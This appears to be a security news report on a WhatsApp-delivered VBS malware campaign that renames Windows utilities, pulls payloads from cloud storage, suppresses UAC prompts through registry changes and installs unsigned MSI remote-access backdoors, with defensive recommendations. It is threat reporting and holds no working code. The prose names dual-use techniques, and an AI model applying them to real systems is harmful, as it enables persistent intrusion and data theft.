A new malware campaign that abuses WhatsApp messages to deliver malicious Visual Basic Script (VBS) files to Windows users, enabling persistent remote access through unsigned MSI installers.
The campaign starts with WhatsApp messages carrying VBS attachments that appear benign but execute as scripts when opened on Windows.
Once launched, the initial script creates hidden folders under C:\ProgramData and copies legitimate Windows tools, such as curl.exe and bitsadmin.exe, into these locations, renaming them to misleading filenames, such as netapi.dll and sc.exe.
Although the filenames change, the binaries retain original PE metadata, including the OriginalFileName field, which still identifies them as curl.exe and bitsadmin.exe.
Microsoft Defender Experts observed a campaign beginning in late February 2026 that uses WhatsApp messages to deliver malicious Visual Basic Script (VBS).
This mismatch between the on-disk name and the embedded metadata provides a practical detection hook for security products that inspect PE headers.
The attackers aim to establish persistence and escalate privileges, ultimately installing malicious MSI packages on victim systems.
In environments where such inspection is limited, defenders must instead monitor command-line arguments and network telemetry associated with these utilities to identify abuse.
WhatsApp Attack Chain
Using the renamed tools, the malware retrieves secondary VBS payloads such as auxs.vbs, 2009.vbs, and WinUpdate_KB5034231.vbs from trusted cloud infrastructure including AWS S3, Tencent Cloud, and Backblaze B2.
By tunneling malicious downloads through widely used cloud platforms, the operators make their traffic resemble ordinary enterprise activity and complicate simple domain- or IP-based blocking.
This stage reflects a broader trend in which attackers weaponize legitimate cloud services to host droppers and command-and-control resources, betting that organizations are reluctant to filter business‑critical platforms aggressively.
The reliance on living-off-the-land binaries (LOLBins) and reputable providers significantly lowers the behavioral profile of the attack, especially in environments that focus primarily on unknown binaries or obvious malware families.
After establishing a foothold, the secondary scripts begin tampering with User Account Control (UAC) and registry settings to secure elevated privileges and persistence.
The malware repeatedly attempts to launch cmd.exe with administrative rights and modifies registry keys under HKLM\Software\Microsoft\Win, including ConsentPromptBehaviorAdmin, to suppress UAC prompts and allow silent elevation.
By combining registry manipulation with UAC bypass techniques, the attackers aim to maintain long‑term administrative access that survives reboots and resists routine cleanup efforts.
These actions are detectable as repeated UAC-related registry changes and unusual elevated command shells spawned from script hosts or renamed Windows utilities.
Unsigned MSI backdoors
In the final stage, the campaign deploys unsigned MSI installers with names such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi to mimic common enterprise software.
The absence of trusted publisher signatures is a strong indicator of malicious intent, given that legitimate installers for these tools are normally signed.
Once installed, remote-access solutions like AnyDesk give the threat actors persistent interactive control over compromised hosts, enabling data theft, further malware deployment, or lateral movement.
Because MSI-based deployment is common in managed environments, these backdoors can easily blend into standard software rollout activities if code-signing and reputation checks are not enforced.
Microsoft recommends hardening endpoints by restricting or blocking script hosts (wscript, cscript, mshta) in untrusted locations and monitoring for renamed or hidden Windows utilities executed with atypical flags.
Enabling cloud-delivered protection, EDR in block mode, attack surface reduction rules for obfuscated or script-launched executables, and tamper protection in Microsoft Defender can significantly reduce the success of similar living-off-the-land campaigns.
Organizations should enhance inspection of traffic to Tencent Cloud, and Backblaze B2, looking for suspicious download patterns rather than relying solely on destination reputation.
Defenders are urged to track registry changes under HKLM\Software\Microsoft\Win and detect repeated UAC tampering as potential compromise indicators, while also blocking known command-and-control endpoints where intelligence is available.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
